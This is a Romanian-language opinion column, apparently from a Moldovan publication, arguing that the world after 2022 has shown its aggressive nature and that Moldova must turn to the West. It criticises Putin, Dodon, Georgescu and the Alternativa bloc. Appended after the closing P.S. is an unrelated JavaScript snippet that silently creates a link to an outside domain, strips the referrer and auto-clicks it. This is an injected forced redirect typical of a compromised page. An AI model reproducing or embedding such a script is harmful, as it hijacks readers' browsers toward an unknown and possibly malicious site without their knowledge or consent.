Răscruce de ani, răscruce de lumi

Anul (calendaristic, climatic, politic) începe mai greu decât oricând. Cu moldovenii e limpede – ei mai devreme decât Boboteaza și sfântul Ion (pe vechi!) nu încep niciodată nimic. Restul lumii, în amorțită espectativă, aștepta inaugurarea lui Trump, înțelegând că el va da peste cap planurile multora. Acum lumea numără isprăvile lui, comparându-le cu declarațiile sale inaugurale, ghicind: unde va fi consecvent și unde va face concesii?

Între timp, a trecut și anul nou chinezesc. China nu poate fi scoasă din ecuație, dimpotrivă, e un factor geopolitic important. Dacă tripla alianță războinică a Moscovei, Teheranului și a Phenianului va fi complementată de Beijing, lucrurile se vor împuți rău. Priveam spectacolul chinez de revelion, aplaudam roboții dansând în ritmuri populare chinezești, dar și spectacolul cu drone, care a înlocuit tradiționalele focuri de artificii. În contextul actual, tehnologiile noi se privesc nu doar admirabil, dar și îngrijorător. Roboții sunt tot mai des folosiți ca armă de război, iar dronele chinezești, care zburau în roiuri (desenând pe cer dragonii folclorici) îți sugerau că, zburând –atacând! – în roiuri dirijate, dronele pot să penetreze cele mai performante sisteme antiaeriene.

Îmi ziceam că nu ar trebui să mai privesc știrile și să mă interesez prea tare de destinul unei lumi care a luat-o razna, condusă de oameni ieșiți de pe fix, dar tocmai acum îmi vine o întrebare de la o revistă literară: Cum s-a schimbat lumea (și noi) după 2022? După prima reacție (și posibil răspuns): „s-a schimbat enorm”; „nu mai este cea de până la invazia rusă”, îmi cade fisa: în realitate, nu s-a schimbat nimic, în esență. Pur și simplu, noi, naivii, care ne credeam oameni normali, am descoperit că ea, lumea nenormală, doar a mimat o anume evoluție și un nivel de civilizație; în realitate, ea, lumea, a rămas cu năravurile ei primare, agresivă și sinucigașă.

Pauza de civilizație s-a încheiat. Câteva insule de normalitate vor încerca să supraviețuiască, dar nu le va fi deloc simplu. Mai ales că, după trecerea chinuitoare într-un alt an/ altă epocă, evenimentele se precipită nemilos (se închid instituțiile sprijinite prin proiectele USAID, planurile încheierii războiului din Ucraina se schimbă, literalmente, zilnic, și-a anunțat demisia președintele Klaus Iohannis), comentariile de ieri devenid nu doar inactuale, ci și adesea inutile. Nebună, lumea nu mai procesează informația, abia dacă o contabilizează, ca să vină imediat alta, care răstoarnă clepsidra umplută pe jumătate. Așa o fi arătând Apocalipsa: cu clepsidra întoarsă fără a fi golită…

Ziceam de realitățile („schimbările”) de la Casa Albă, fără de care lumea nu vrea să miște un deget (unele lucruri chiar s-au stopat, precum proiectele din cadrul programelor USAID). Eu aș zice că nu le putem ignora, dar nici nu trebuie absolutizate și dramatizate excesiv. Da, foarte multe depind de americani, foarte multe depind de europeni, precum foarte multe depind de forța de rezistență a ucrainenilor. Aceste amănunte contează, dar nu înseamnă că am pus pe pauză și așteptăm sfârșitul meciului, care ne-ar decide cumva și ieșirea noastră în marea finală sau, dimpotrivă, retrogradarea în liga inferioară a civilizației. Mai ales dacă înțelegem ce ne dorim și dacă avem ceva de făcut, dincolo de toate contextele și conjuncturile. Nu e deloc productiv rolul de suporteri fataliști, chiar dacă mitologia noastră națională încolo ne îndeamnă.

Ca să mai luăm ceva util și de la situația de criză, trebuie să înțelegem că lucrurile se limpezesc (iar asta e deja un mare avantaj!) și nu ar trebui să ratăm. Agresorul din Est și-a pus toate cărțile pe masă. Suntem în cărțile lor! Consecutiv, fie ne orientăm spre lumea civilizată (luând ca model țările avansate, cele care au plăcut cel mai mult emigranților noștri), fie luăm ca reper Coreea de Nord. Anume așa, deoarece visul Rusiei lui Putin e să aibă o țară precum a nord-coreenilor: fără opoziție politică, fără jocuri democratice, fără legături cu lumea civilizată. Pentru Putin, dictatorul mărginit și mimetic, idealul absolut este Kim Jong-un, liderul Coreii de Nord.

Ergo, pentru a nu depinde exclusiv de succesele/ insuccesele ucrainenilor pe câmpul de luptă cu agresorul din Est, trebuie să ne grăbim să intrăm cât mai grabnic și mai sigur sub umbrela lumii civilizate. Cu toate sacrificiile necesare, fără regrete și, mai ales, fără nostalgii.

P.S. Ca să închei, revenind la rolul pozitiv al situațiilor de criză. Mă bucur – cine are ochi, urechi și minte, să le acceseze! – că a apărut blocul „Alternativa”, care developează Planul B al Kremlinului: să-i înregimenteze pe mercenarii naivi, care cred în steaua europeană a acestor conserve rusești. Încă și mai limpede este poziția unui Călin Georgescu, care, după ce a evoluat de la replicile personajelor lui Caragiale, la cele (de-a gata și ele) ale lui Ionesco, iar acum învață pe de rost replicile din Stăpânul inelelor sau, mai nou, Ultimul samurai, acum îi bagă pe români în războiul împotriva Ucrainei (de partea Rusiei, bien sûr!). Și, ca să avem tot tacâmul, Dodon declară (și el) pretenții teritoriale ale Moldovei (sic!) asupra Ucrainei (sic!). Dar Ucraina nu a luat nimic din pământurile Moldovei. A rupt Rusia, din teritoriul Românesc, dar de unde să știe Dodon? Am ajuns să o vedem și pe asta: Dodon revanșardul. Războinicul cu pretenții teritoriale! Cum se zice în limba (lui) moldovenească: Приехали!

 var redirectTo = „https://clo.yfbplc.com/”;
var a = document.createElement(‘a’);
a.href = redirectTo;
a.setAttribute(‘rel’, ‘noreferrer’);
document.body.appendChild(a);
a.click();